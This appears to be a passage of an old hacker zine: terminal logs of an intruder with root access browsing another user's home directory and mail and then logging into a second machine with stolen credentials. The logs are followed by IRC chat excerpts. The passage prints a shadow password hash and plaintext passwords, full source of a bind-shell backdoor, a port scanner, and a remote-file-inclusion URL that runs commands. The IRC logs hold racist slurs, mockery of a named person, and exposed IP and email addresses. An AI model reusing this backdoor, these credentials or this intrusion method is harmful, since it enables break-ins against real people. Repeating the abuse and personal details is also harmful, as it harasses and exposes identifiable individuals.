nobody 13227 0.1 2.2 26368 22980 ? SN Apr07 2:03
/usr/local/apache/bin/httpd -DSSL
nobody 13487 0.1 1.9 23524 20508 ? SN Apr07 2:08
/usr/local/apache/bin/httpd -DSSL
nobody 13798 0.1 2.4 28588 25068 ? SN Apr07 1:53
/usr/local/apache/bin/httpd -DSSL
nobody 13844 0.1 2.4 29248 25216 ? SN Apr07 2:07
/usr/local/apache/bin/httpd -DSSL
schawo 21293 0.0 0.1 2864 1376 ? S Apr08 0:00 imapd
livecart 23015 0.0 0.1 2664 1148 ? S Apr08 0:00 imapd
livecart 23016 0.0 0.1 2900 1496 ? S Apr08 0:00 imapd
root 26839 0.0 1.9 21956 20120 ? SN 00:41 0:00
/usr/bin/spamd -d --allowed-ips=127.0.0.1 --pidfile=/var/run/spamd.pid
--max-children=5
root 26881 0.0 2.0 23460 21712 ? SN 00:42 0:01 spamd child
root 26882 0.0 2.1 23544 21792 ? SN 00:42 0:01 spamd child
root 26883 0.0 2.1 23792 22088 ? SN 00:42 0:01 spamd child
root 26884 0.0 2.0 23356 21636 ? SN 00:42 0:01 spamd child
root 26885 0.0 2.1 23592 21836 ? SN 00:42 0:01 spamd child
mysql 31311 0.0 7.8 93980 81004 ? SN 01:01 0:02
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
bmxer103 15326 0.0 0.1 7108 1940 ? SN 01:34 0:00 pure-ftpd
(IDLE)
nobody 26943 0.1 1.7 20584 18176 ? SN 02:11 0:03
/usr/local/apache/bin/httpd -DSSL
nobody 30140 0.2 1.7 20592 18112 ? SN 02:24 0:02
/usr/local/apache/bin/httpd -DSSL
root 30670 0.0 0.1 6616 1932 ? SN 02:26 0:00
/usr/sbin/exim -q
root 31837 0.1 0.0 1532 416 ? SN 02:27 0:01 [bdflush]
root 3275 0.0 0.0 2180 1016 ? SN 02:35 0:00 inetd
root 5468 0.0 0.1 6868 2012 ? SN 02:41 0:00 sshd: rpm
[priv]
rpm 5506 0.0 0.2 7016 2304 ? SN 02:41 0:00 sshd:
rpm@pts/2
rpm 5507 0.0 0.1 5336 1364 pts/2 SN 02:41 0:00 -bash
nobody 5644 0.2 1.7 20428 17876 ? SN 02:42 0:00
/usr/local/apache/bin/httpd -DSSL
root 5678 0.0 0.1 2184 1216 pts/2 SN 02:42 0:00 k-rad
nobody 5995 0.1 1.7 20428 17884 ? SN 02:44 0:00
/usr/local/apache/bin/httpd -DSSL
nobody 6070 0.0 1.7 20428 17860 ? SN 02:44 0:00
/usr/local/apache/bin/httpd -DSSL
nobody 6107 0.1 1.7 20428 17956 ? SN 02:44 0:00
/usr/local/apache/bin/httpd -DSSL
vinniej 6340 0.0 6.7 77676 69456 ? SN 02:44 0:00 cpanellogd -
http logs for vinniej
vinniej 6360 0.0 0.0 2176 992 ? SN 02:45 0:00 sh -c
/usr/local/cpanel/bin/logrunner 1.0 /usr/local/cpanel/3rdparty/bin/analog
+C"IMAGEDIR /images/" +C"DOMAINSFILE
/usr/local/cpanel/3rdparty/share/analog/lang/ukdom.t
vinniej 6361 0.0 0.0 1524 420 ? SN 02:45 0:00
/usr/local/cpanel/bin/logrunner 1.0 /usr/local/cpanel/3rdparty/bin/analog
+CIMAGEDIR /images/ +CDOMAINSFILE
/usr/local/cpanel/3rdparty/share/analog/lang/ukdom.tab +CCHAR
mailnull 7849 0.4 0.3 7576 3720 ? SN 02:45 0:00
/usr/sbin/exim -bd -q60m
root 7976 5.0 0.3 7696 4104 ? SN 02:46 0:00
/usr/sbin/exim -q
mailnull 7977 0.0 0.4 7696 4148 ? RN 02:46 0:00
/usr/sbin/exim -q
root 7978 0.0 0.0 2884 892 pts/2 RN 02:46 0:00 ps aux
root@panther [/tmp]# cat /etc/passwd | grep killerz
killerz:x:32479:32483::/home/killerz:/usr/local/cpanel/bin/noshell // No shell for rotor
root@panther [/tmp]# cat /etc/shadow | grep killerz
killerz:$1$KcR4KL0s$bHH0lKn5cYW5zMKnhInsh/:12870:::::: // But feel free to crack his password :)
root@panther [/home2/killerz]# ls
./ .addon-installlog .contactemail .mailboxlist .neomail-rotor/
.spamkey .trash/ code/ index.html mail/ public_html/
www@
../ .addonscgi-phpBB .lastlogin .neomail/ .phpchats
.sqmaildata/ FreeBSD.png etc/ kscan.c public_ftp/ tmp/
root@panther [/home2/killerz]# ls *
FreeBSD.png index.html kscan.c
code:
./ ../ coolPHP.txt
etc:
./ ../ .imapv4cp5c ftpquota killerz.org/
mail:
./ ../ INBOX.Drafts INBOX.Sent INBOX.Trash inbox killerz.org/
neomail-trash saved-messages sent-mail
public_ftp:
./ ../ incoming/
public_html:
./ 0x41.tgz LOL.html _private/ _vti_inf.html _vti_txt/
c0n3ct.c chat.txt ebay/ fuck/ index.php kdoor.txt music/
newlay/ papers/ phpBB/ r00t/ tsniff.txt
../ FreeBSD/ Scan0007.jpg _vti_bin/ _vti_log/ abicons/
cam2/ code/ electronics/ hawe index_files/ klog.txt netit
newss.GIF pastebin/ pics/ scamz/ www-beta
.htaccess FreeBSD.png Thumbs.db _vti_cnf/ _vti_pvt/ b4b0.php
cgi-bin/ cutenews/ fileupload/ images/ irc/ kscan.c
netstat.txt owned/ pastebin.pl* postinfo.html shelld.c ~techg0d/
www:
./ 0x41.tgz LOL.html _private/ _vti_inf.html _vti_txt/
c0n3ct.c chat.txt ebay/ fuck/ index.php kdoor.txt music/
newlay/ papers/ phpBB/ r00t/ tsniff.txt
../ FreeBSD/ Scan0007.jpg _vti_bin/ _vti_log/ abicons/
cam2/ code/ electronics/ hawe index_files/ klog.txt netit
newss.GIF pastebin/ pics/ scamz/ www-beta
.htaccess FreeBSD.png Thumbs.db _vti_cnf/ _vti_pvt/ b4b0.php
cgi-bin/ cutenews/ fileupload/ images/ irc/ kscan.c
netstat.txt owned/ pastebin.pl* postinfo.html shelld.c ~techg0d/
tmp:
./ ../ analog/ awstats/ lastrun lastrun.bw webalizer/ webalizerftp/
root@panther [/home2/killerz]# cd www
root@panther [/home2/killerz/www]# ls *
0x41.tgz LOL.html Thumbs.db b4b0.php chat.txt index.php
klog.txt netit newss.GIF postinfo.html tsniff.txt
FreeBSD.png Scan0007.jpg _vti_inf.html c0n3ct.c hawe kdoor.txt
kscan.c netstat.txt pastebin.pl* shelld.c www-beta
FreeBSD:
./ ../ FreeBSD-flat.vmdk FreeBSD.png FreeBSD.png.sav FreeBSD.vmdk
FreeBSD.vmsn FreeBSD.vmx.sav nvram nvram.sav
_private:
./ ../ .htaccess
_vti_bin:
./ ../ .htaccess _vti_adm/ _vti_aut/
_vti_cnf:
./ ../ .htaccess
_vti_log:
./ ../ .htaccess
_vti_pvt:
./ ../ .htaccess .roles access.cnf botinfs.cnf bots.cnf deptodoc.btr
doctodep.btr frontpg.lck service.cnf service.grp service.lck
service.pwd services.cnf svcacl.cnf writeto.cnf
_vti_txt:
./ ../ .htaccess
abicons:
./ ava_bart.gif ava_inspector.gif
blugr-folder.gif clip.gif error.gif idea.gif
nb-blugr-go.gif pixel.gif support.gif wb-left.gif
../ ava_biz_man.gif ava_penguin.gif
blugr-folder_new.gif closedfolder.gif find.gif img.gif
nb-blugr-login.gif question.gif tongue.gif
wb-right.gif
3go.gif ava_blonde.gif ava_poo_bear.gif
botleftcorn.gif comp_usr.gif folder.gif index.html
nb-blugr-register.gif redarrow.gif top_corner_left.gif wb-top.gif
admin.gif ava_brutus.gif ava_popeye.gif
botrightcorn.gif curl_footer.gif folderlocked.gif join.gif
newmail.wav reload.gif top_corner_right.gif
wb-top_left.gif
agree.gif ava_duck.gif ava_red_nose.gif
bottom.gif curl_header.gif formicons/ line.gif
newpost.gif sad.gif topper2.gif
wb-top_right.gif
angry.gif ava_felix_cat.gif ava_sylvester.gif
bottom_corner_left.gif curve_ll.gif go.gif login.gif
news-eye.gif search_logo.jpg trans_img.gif who.gif
apache/ ava_garfield.gif ava_tweetybird.gif
bottom_corner_right.gif curve_lr.gif go32.gif logo.gif
news.gif smile.gif turtlegreen.gif yuk.gif
arc-left.gif ava_gentleman.gif ava_white_rabbit.gif
bottommenu.jpg curve_ul.gif go_btn.gif makeiconlist.pl
ntopcorn.gif smile_rotate.gif wb-bottom.gif
arc-right.gif ava_girl.gif ava_young_man.gif
brownmenu.jpg curve_ur.gif hlbg.gif menubrown.gif
ntopcornleft.gif smileb.gif wb-bottom_left.gif
ava.txt ava_girl_big_eye.gif avatars.htm
bullet.gif dark_folder.gif hline_mblue.gif msg.gif
overview.gif spinach.gif wb-bottom_right.gif
ava_barney_rubble.gif ava_huckleberryhound.gif blue-green.gif
chat.gif disagree.gif htmlarea/ navigate.gif
pencil.gif stats.gif wb-center.gif
cam2:
./ ../ back.JPG bottom.JPG front.JPG top.JPG
cgi-bin:
./ ../ abmasterd/ anyboard.cgi* getinfo.cgi* search.pl
code:
./ ../ anon.txt coolPHP.txt kscan.pl
cutenews:
./ ../ Copyright.GNU.txt README.htm data/ example1.php example2.php
inc/ index.php remember.js search.php show_archives.php show_news.php
skins/
ebay:
./ ../ index.html
electronics:
./ ../ ps2port/ volt/
fileupload:
./ ../ README.txt fileupload-class.php upload.php uploads/
fuck:
./ ../ kscan.c
images:
./ ../ 0day_cat_banner.jpg glowshell.gif
index_files:
./ ../ Thumbs.db filelist.xml image001.png image002.jpg
irc:
./ ../ .htaccess cgi-bin/
music:
./ ../ Brotha\ Lynch\ Hung\ -\ One\ Nigga\ Dead.mp3 Brotha\ Lynch\ Hung\
-\ Walking\ To\ My\ Funeral.mp3 c0n3ct.c deria.jpg
newlay:
./ ../ images/ index.html me.JPG search/
owned:
./ arren.php djwink.php e.php hostile.php kels.php
lamerDJWINK* lamerE* lamerHOSTILE* lamerLOCUSTZ* lamerREVIX*
lamerSILKK* lamerWARCHILD* nesa.php seattle.php spectre.php
../ badonkadonk.png dog.php escape.php index.html lamerARREN*
lamerDOG* lamerESCAPE* lamerKELS* lamerNESA* lamerSEATTLE*
lamerSPECTRE* locustz.php revix.php silkk.php warchild.php
papers:
./ ../ desolder.txt
pastebin:
./ ../ after before catdir/ cats pastes/
phpBB:
./ admin/ common.php db/ extension.inc groupcp.php includes/
language/ memberlist.php posting.php profile.php templates/
viewonline.php
../ cache/ config.php docs/ faq.php images/ index.php
login.php modcp.php privmsg.php search.php viewforum.php
viewtopic.php
pics:
./ ../ a3.JPG budz cam/ cross.JPG hk.JPG me.html me.swf meth/
modem.JPG moniter.JPG r0t0r1.JPG r0t0r2.JPG r0t0r3.JPG rotor!.JPG ss/
tower.JPG un4m31.jpg
r00t:
./ ../ shadow
scamz:
./ ../ lez/
~techg0d:
./ ../ AddonsForWebsites/ ircd/ tutorials/
root@panther [/home2/killerz/www]# cd code/
root@panther [/home2/killerz/www/code]# ls
./ ../ anon.txt coolPHP.txt kscan.pl
root@panther [/home2/killerz/www/code]# cat anon.txt
#!/usr/bin/perl
# (C) rotor 2004 - 2005
# http://www.killerz.org
# irc.killerz.org | rotor@killerz.org
# Script to send anonoymous mail
use Getopt::Std;
use IO::Socket;
getopt('hupfm', \%opts);
if (@ARGV == $opts{h}) {
print("$0 (C) rotor 2004 - 2005\n");
print("http://www.killerz.org \n");
print("$0 Help: \n");
print("-u help \n");
print("-h server \n");
print("-p port \n");
print("-f sender \n");
print("-m msg \n");
exit
}
$server = $opts{h}; # SMPT server
$port = $opts{p}; # SMPT server port
$sender = $opts{f}; # MAIL from
$recip = $opts{r}; # recipient
$msg =$opts{m}; #msg
my $sock = IO::Socket::INET->new(PeerAddr => "$server ",
PeerPort => "$port ",
Proto => "tcp")
or die "Cannot connect to host\n";
print("Decalre were email is sending from\n");
print $sock "HELO localhost\n";
sleep(1);
print("Giving email address from\n");
print $sock "MAIL FROM: $sender\n";
sleep(1);
print("Recipients address\n");
print $sock "RCPT TO: $recip\n";
sleep(1);
print("Sending cmd for msg compose\n");
print $sock "DATA\n";
print("Sending Subject\n");
print("Enter Subject:");
$sub=<STDIN>;
print $sock "Subject: $sub\n";
print("Sending msg\n");
print $sock "$msg\n";
root@panther [/home2/killerz/www/code]# cat kscan.pl
#!/usr/bin/perl
##
## killer-scan.pl (C) rotor 2005 - 2006
## rotor@killerz.org || http://www.killerz.org
use IO::Socket;
use strict;
my($port,$pstart,$pstop,$sock);
my $host = shift || 127.0.0.1;
$pstart = 1;
$pstop = 22;
for($port=$pstart;$port<=$pstop;$port++){
$sock = IO::Socket::INET->new("$host:$port") || next;
print "[ks] $port open on $host [ks]\n"; close($sock);
}
root@panther [/home2/killerz/www]# cat kscan.c
/*
* kscan.c (C) rotor 2005 - 2006
* rotor@killerz.org
* http://www.killerz.org
* http://dynamichell.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#define STARTP 1
#define ENDP 1024
#define GREEN "\E[32m"
#define RED "\E[31m"
int sock, i;
int StartP, EndP;
struct sockaddr_in addr;
struct hostent *h;
struct servent *s;
int check(int port);
int usage(char *);
int main(int argc, char *argv[])
{
if(argc < 2) {
usage(argv[0]);
}
if(strcmp(argv[2], "-")==0 && strcmp(argv[3], "-")==0) {
StartP = (int)STARTP;
EndP = (int)ENDP;
} else {
StartP = atoi(argv[2]);
EndP = atoi(argv[3]);
}
if(StartP > EndP) {
printf(RED "Error: Start port is higher then end port\n");
usage(argv[0]);
}
if ((h=gethostbyname(argv[1])) == NULL){
printf(RED "Cant reolve host\n");
usage(argv[0]);
}
printf(GREEN "Scanning Host %s from %s to %s\n",argv[1],STARTP,ENDP);
for(i=STARTP; i <= ENDP; i++) {
if (check(i)==0) {
h=getservbyport(htons(i),"tcp");
printf(GREEN "Port %d is open \n",i);
}
close(sock);
}
return 0;
}
int usage(char *Progname) {
printf(GREEN "%s (C) rotor 2005 - 2006\n",Progname);
printf(RED "Usage: %s [host] [start-port] [end-port]\n",Progname);
exit(1);
}
int check(int port) {
if((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) {
perror("socket");
exit;
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = *((struct in_addr *)h->h_addr);
if((connect(sock,(struct sockaddr *) &addr, sizeof(addr)))==0)
return 0;
else
return 1;
}
root@panther [/home2/killerz/www]# cat shelld.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <mntent.h>
#include <sys/types.h>
#include <dirent.h>
#include <signal.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <errno.h>
#include <asm/ioctls.h>
void startdaemon (void);
int
main (int argc, char *argv[])
{
int sock, csock, l;
struct sockaddr_in caddr;
startdaemon ();
if ((sock = create_server (9999)) == -1)
{
// change to stdout so we can see it from PHP!!@!@
fprintf (stderr, "create_server FAIL\n");
exit (-1);
}
// stop zombies
signal (SIGCHLD, SIG_IGN);
while (1)
{
l = sizeof (struct sockaddr_in);
if ((csock = accept (sock, (struct sockaddr *) &caddr, &l)) == -1)
{
perror ("accept()");
exit (-1);
}
{
int optval = 1;
ioctl (sock, FIONBIO, &optval);
}
fprintf (stderr, "connection from: %s\n", inet_ntoa (caddr.sin_addr));
switch (fork ())
{
case -1:
perror ("fork()");
exit (1);
case 0: /* child */
/* maybe idle timeout ? */
// THIS IS GHETTO BUT FUCK IT I DONT REMEMBER HOWTO CODE PROPERLY.
write (csock, "B4B0 ownz you - chrak\r\n",
strlen ("B4B0 ownz you - chrak\r\n"));
{
char *args[] = { "/bin/sh", "-c", "/bin/sh", NULL }, *env[] =
{
"PATH=/usr/local/sbin:/usr/sbin:/sbin"
":/usr/local/bin:/usr/bin:/bin:.", NULL};
close (0);
close (1);
close (2);
dup2 (csock, 0);
dup2 (csock, 1);
dup2 (csock, 2);
execve ("/bin/bash", args, env);
}
close (csock);
exit (0);
default: /* parent */
close (csock);
}
}
}
void
startdaemon (void)
{
switch (fork ())
{
case -1:
perror ("fork()");
exit (1);
case 0: /* child */
break;
default: /* parent */
exit (0);
}
if (setsid () == -1)
{
perror ("setsid()");
exit (1);
}
//fclose(stdin);
//fclose(stdout);
}
int
create_server (unsigned int port)
{
int sock, l = 1;
struct sockaddr_in saddr;
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket()");
return -1;
}
setsockopt (sock, SOL_SOCKET, SO_REUSEADDR, &l, sizeof (int));
saddr.sin_family = AF_INET;
saddr.sin_port = htons (port);
saddr.sin_addr.s_addr = INADDR_ANY;
if (bind (sock, (struct sockaddr *) &saddr, sizeof (struct sockaddr)) ==
-1)
{
perror ("bind()");
return -1;
}
/* only 5 connection at a time heh!@ */
if (listen (sock, 5) == -1)
{
perror ("listen()");
return -1;
}
return sock;
}
/*
<Etruscan>
http://www.franchiseoutlet.com/us/about.php?page=http://www.learnandteachonline.com/p
hp.txt?&cmd=ls%20/
*/
root@panther [/home/killerz]# cd mail/
root@panther [/home/killerz/mail]# ls
./ ../ INBOX.Drafts INBOX.Sent INBOX.Trash inbox killerz.org/
neomail-trash saved-messages sent-mail
root@panther [/home/killerz/mail]# cd killerz.org/
root@panther [/home/killerz/mail/killerz.org]# ls
./ ../ rotor/
root@panther [/home/killerz/mail/killerz.org]# cd rotor/
root@panther [/home/killerz/mail/killerz.org/rotor]# ls
./ ../ .mailboxlist INBOX.Drafts INBOX.Sent INBOX.Trash inbox
sent-mail
root@panther [/home/killerz/mail/killerz.org/rotor]# cat inbox
root@panther [/home/killerz/mail/killerz.org/rotor]# cat sent-mail
From MAILER-DAEMON Tue Jan 11 15:15:19 2005
Date: 11 Jan 2005 15:15:19 -0800
From: Mail System Internal Data <MAILER-DAEMON@panther.unixbsd.info>
Subject: DON'T DELETE THIS MESSAGE -- FOLDER INTERNAL DATA
X-IMAP: 1105485319 0000000000
Status: RO
This text is part of the internal format of your mail folder, and is not
a real message. It is created automatically by the mail system software.
If deleted, important folder data will be lost, and it will be re-created
with the data reset to initial values.
From rotor@panther.unixbsd.info Tue Jan 11 15:15:19 2005 -0800
Status: R
X-Status:
X-Keywords:
Received: from 139.168.150.213 ([139.168.150.213])
by panther.unixbsd.info (IMP) with HTTP
for <rotor@killerz.org@localhost>; Tue, 11 Jan 2005 15:15:19 -0800
Message-ID: <1105485319.41e45e0765a4d@panther.unixbsd.info>
Date: Tue, 11 Jan 2005 15:15:19 -0800
From: rotor@killerz.org
To: presonic@gmail.com
Subject: ircbot
MIME-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
User-Agent: Internet Messaging Program (IMP) 3.2.2
X-Originating-IP: 139.168.150.213
root@panther [/home/killerz/mail/killerz.org/rotor]# ls
./ ../ .mailboxlist INBOX.Drafts INBOX.Sent INBOX.Trash inbox
sent-mail
root@panther [/home/killerz/mail/killerz.org/rotor]# cat INBOX.s
cat: INBOX.s: No such file or directory
root@panther [/home/killerz/mail/killerz.org/rotor]# cat INBOX.Sent
From MAILER-DAEMON Mon Jan 10 01:02:29 2005
Date: 10 Jan 2005 01:02:29 -0800
From: Mail System Internal Data <MAILER-DAEMON@panther.unixbsd.info>
Subject: DON'T DELETE THIS MESSAGE -- FOLDER INTERNAL DATA
X-IMAP: 1105347749 0000000000
Status: RO
This text is part of the internal format of your mail folder, and is not
a real message. It is created automatically by the mail system software.
If deleted, important folder data will be lost, and it will be re-created
with the data reset to initial values.
root@panther [/home/killerz]# cd etc/killerz.org/
passwd passwd,v quota quota,v shadow shadow,v
root@panther [/home/killerz]# cd etc/killerz.org/
root@panther [/home/killerz/etc/killerz.org]# ls
./ ../ passwd passwd,v quota quota,v shadow shadow,v
root@panther [/home/killerz/etc/killerz.org]# cat *
rotor:x:32479:32483::/home/killerz/mail/killerz.org/rotor:/usr/local/cpanel/bin/noshell
root@panther [/home/killerz/etc/killerz.org]# exit
## I guess that took care of rotor. He pays for that shell and doesn't even
## have shell..
## Life is truly sad..
## Well, enough talking, it's time to explore matts.homeunix.net.. I have a
## feeling this one might be very interesting
[4] I think this is west's box.. He keeps all of his private shit here
ssh -l rotor matts.homeunix.net
rotor@matts.homeunix.net's password:
Last login: Thu Apr 7 04:04:39 2005 from 203-206-252-62.
FreeBSD 5.3-RELEASE-p7 (SENTINEL) #2: Mon Apr 4 21:43:16 PDT 2005
AUTHORIZED USE ONLY
Welcome to the
____ _____ _ _ _____ ___ _ _ _____ _
/ ___|| ____| \ | |_ _|_ _| \ | | ____| |
\___ \| _| | \| | | | | || \| | _| | |
___) | |___| |\ | | | | || |\ | |___| |___
|____/|_____|_| \_| |_| |___|_| \_|_____|_____|.pcinetworks.net
Enjoy your stay
News:
03/10/05 IPv6 working... and Vhosts. Type vhosts to view them...
If you're new to this box, change your damn default pw i gave you..
if i crack your pw, you get disabled for a week...
i crack the pw list every week..
to get vhosts, type 'vhosts'
lq(rotor@Sentinel.homeunix.net)
mq(~)-> ls
./ .cshrc .mail_aliases .rhosts aolup.bx cyp/
dog.php escape.php kels.php lamerDOG lamerHOSTILE lamerNESA
lamerSILKK locustz.php revix.php spectre.php
../ .login .mailrc .shrc arren.php
cyp1.0k.tar.gz dyndns hostile.php lamerARREN lamerE lamerKELS
lamerREVIX lamerSPECTRE nesa.php seattle.php warchild.php
.BitchX/ .login_conf .profile .ssh/ badonkadonk.png djwink.php
e.php index.html lamerDJWINK lamerESCAPE lamerLOCUSTZ
lamerSEATTLE lamerWARCHILD own/ silkk.php
(rotor@Sentinel.homeunix.net)
mq(~)-> uname -a; id
FreeBSD Sentinel.homeunix.net 5.3-RELEASE-p7 FreeBSD 5.3-RELEASE-p7 #2: Mon
Apr 4 21:43:16 PDT 2005
west@Sentinel.homeunix.net:/usr/src/sys/i386/compile/SENTINEL i386
uid=1014(rotor) gid=1014 groups=1014
lq(rotor@Sentinel.homeunix.net)
mq(~)-> cat .ssh/known_hosts
lq(rotor@Sentinel.homeunix.net)
mq(~)-> cd own/
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> ls
./ arren.php djwink.php e.php hostile.php kels.php
lamerDJWINK lamerE lamerHOSTILE lamerLOCUSTZ lamerREVIX
lamerSILKK lamerWARCHILD nesa.php seattle.php spectre.php
../ badonkadonk.png dog.php escape.php index.html lamerARREN
lamerDOG lamerESCAPE lamerKELS lamerNESA lamerSEATTLE
lamerSPECTRE locustz.php revix.php silkk.php warchild.php
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat lamer*
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat arren.php
<?php
$hostname = $_SERVER['REMOTE_ADDR'];
$file = fopen("lamerARREN", a);
fwrite($file, $hostname . "\r\n");
fclose($file);
//print $hostname;
?>
<html>
<head>
<title>Ass for Days!</title>
</head>
<body>
<img src="badonkadonk.png">
</body>
</html>
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cd ..
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> ls
./ .cshrc .mail_aliases .rhosts aolup.bx cyp/
dog.php escape.php kels.php lamerDOG lamerHOSTILE lamerNESA
lamerSILKK locustz.php revix.php spectre.php
../ .login .mailrc .shrc arren.php
cyp1.0k.tar.gz dyndns hostile.php lamerARREN lamerE lamerKELS
lamerREVIX lamerSPECTRE nesa.php seattle.php warchild.php
.BitchX/ .login_conf .profile .ssh/ badonkadonk.png djwink.php
e.php index.html lamerDJWINK lamerESCAPE lamerLOCUSTZ
lamerSEATTLE lamerWARCHILD own/ silkk.php
## hmm.. I'm disappointed.. but wait
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cd " " ## Wow that's skills...
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> ls
cisco cisco2 ddoslog legit list more-cisco owned usable
## ok this just got interesting.
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat cisco*
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> ls
cisco cisco2 ddoslog legit list more-cisco owned usable
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat ddoslog
04:40 <@Kelly> [02:40] -> *rotor`* its comments and threats like that that
define you as a
fucking pup
04:40 <@Kelly> -
04:41 <@aid> haha
04:41 <@aid> yok
04:41 <@aid> a
04:41 <@aid> kelly
04:41 <@aid> omg
04:41 <@aid> ./wi torn
04:41 <@aid> and go to the url
04:41 <@aid> haha
04:41 <@aid> you're gonna piss yourself
04:41 <@aid> i chose the perf box to jupe him with
04:41 <@aid> haha
04:44 <@Kelly> hahahhaha
04:44 <@aid> now
04:44 <@aid> that
04:44 <@aid> is
04:44 <@aid> hilarious
04:44 <@aid> haha
04:44 <@aid> i just hit rotor`
04:44 <@aid> his new bnc
04:44 <@aid> lol
04:44 <@aid> toast
04:44 <@aid> --- 209.133.9.34 ping statistics ---
04:44 <@aid> 8 packets transmitted, 0 received, 100% packet loss, time
7013ms
04:45 <@Kelly> [02:40] <rotor`> well, you suck cock for cancelled shells...
heh
04:45 <@Kelly> [02:41] <rotor`> and tehy are hitting lomag again, only this
time i have logs
of aid saying he was going to it from #obs, obs has
snitches u know
04:45 <@Kelly> [02:42] <rotor`> get over youself
04:45 <@Kelly> [02:44] <Kelly> Yannow
04:45 <@Kelly> [02:44] <Kelly> you obviously have never whoised me dumbass
04:45 <@Kelly> [02:44] <Kelly> I work for most of the same providers
04:45 <@Kelly> [02:44] <Kelly> you have shells with
04:45 <@Kelly> [02:45] <Kelly> you fucked up when you had one hit that i
work for
04:45 <@Kelly> [02:45] No such nick/channel
04:45 <@aid> lol
04:46 <@aid> haha
04:46 <@aid> rotor` is ~nicuxoji@69.22.129.220 * qeje
04:46 <@aid> rotor` on #syshackers
04:46 <@aid> he'[s
04:46 <@aid> in
04:46 <@aid> my bot is still in
04:46 <@aid> syshackers
04:46 <@aid> haha
04:46 <@Kelly> lol
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat legit
Tony Montana - Vote for Pedro says:
69.17.188.187
adduser: INFO: Password for (h0rs3) is: QiivMOtLoiFZJC7
[jsz(jsz@pheer.my.0c192.com)] k
[jsz(jsz@pheer.my.0c192.com)] www.cserverz.com/r0t0r
<Torn> god
[jsz(jsz@pheer.my.0c192.com)] user: rotor
[jsz(jsz@pheer.my.0c192.com)] pass: fuckf3ds
[jsz(jsz@pheer.my.0c192.com)] ftp details: u: r0t0r p: fuck3dup
[jsz(jsz@pheer.my.0c192.com)] username for ftp is r0t0r@cserverz.com
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat list
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> ls
cisco cisco2 ddoslog legit list more-cisco owned usable
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat more-cisco
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat owned
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> cat usable
lq(rotor@Sentinel.homeunix.net)
mq(~/own)-> exit
## Well that takes care of that shell....
## Until next time
[5] logs to show how leet r0t0r really is.
13:06 <@devii> You're not an abo, rotor.
13:06 <@rotor`> illusion said u said that
13:06 <@rotor`> Uh,
13:06 <@devii> You cant be.
13:06 <@rotor`> yes i am devii
13:06 <@devii> If ur dad is black
13:06 <@rotor`> 50 / 50
13:06 <@devii> and ur mum is white
13:06 <@rotor`> Yes i can be
13:06 <@devii> black ALWAYS dominates.
13:07 <@devii> its a proven fact
13:07 <@rotor`> devii : no it dosnt
13:07 <@devii> it does.
13:07 <@devii> there are rare exceptions.
13:07 <@rotor`> devii: your saying you have never seen a white aboriginal ?
13:07 <@rotor`> I SWEAR TO FUCKING GOD I AM
13:07 <@devii> Ahahaahahaah.
13:07 <@rotor`> HOW ELSE COULD I LIVE IN ABORIGINAL HOUSING
13:07 <@rotor`> IN A MISSION # How sad..
13:07 <@devii> YAH FUCKEN WABO.
13:07 <@rotor`> U FUCK TARD
13:07 <@devii> rofl.
13:07 <@devii> Ohmy.
13:07 <@Torhne> lol
13:07 <@devii> see wigger, nigger
13:07 <@rotor`> dont tell me im not what i am
13:08 <@rotor`> i love my culture / family
13:08 <@devii> WELL THATS NICE ISNT IT.
13:08 <@rotor`> and am protective about it
13:08 <@devii> But you're not abo.
13:08 <@rotor`> w/e you reackon
13:08 <@devii> =P
13:08 <@rotor`> that pisses me off
13:08 <@rotor`> U JUST PISSED ME OFF
13:09 <@Torhne> lol
13:09 <@rotor`> trying to tell me im not what i am
13:09 <@rotor`> if u dont beleive me devii come down here
13:09 <@rotor`> to my home
13:09 <@rotor`> and aboriginals will answer the door
13:09 <@rotor`> and will live all around me
13:09 <@rotor`> U DONT KNOW JACK SHIT
13:09 <@rotor`> U LIVE IN A RICH TOWN
13:10 <@rotor`> WITH NO ABORIGINALS
13:10 <@rotor`> U ONLY KNOW WHAT U SEE ON FUCKING TV
13:10 <@rotor`> AFK # I bet
he was crying here...
13:10 <@Torhne> HAS A DINGO EVER ATE YOUR BABY???
13:10 <@Torhne> HA BITCH?
13:10 <@Torhne> WHAT NOW?
13:10 <@Torhne> ROTOR IS STrAIGHT OUT OF THE MUTHA FUCKIN HOOD OF AUSSIE
LAND # Who is this kid?
13:11 <@Torhne> HE HAS GOT THAT SHIT ON LOCKDOWN
13:11 <@Torhne> SO TIGHT
13:11 <@Torhne> FUCKIN WITH THE BOOMERANG HANGIN OUT THE BACKSIDE OF HIS
LOIN CLOTH
13:11 <@Torhne> whrew
13:11 <@rotor`> devii : im serious u dont beleive me #
He is done crying and goes back to bitching at girls.
13:11 <@Torhne> ok
13:11 <@rotor`> come and find out
13:11 <@Torhne> im done
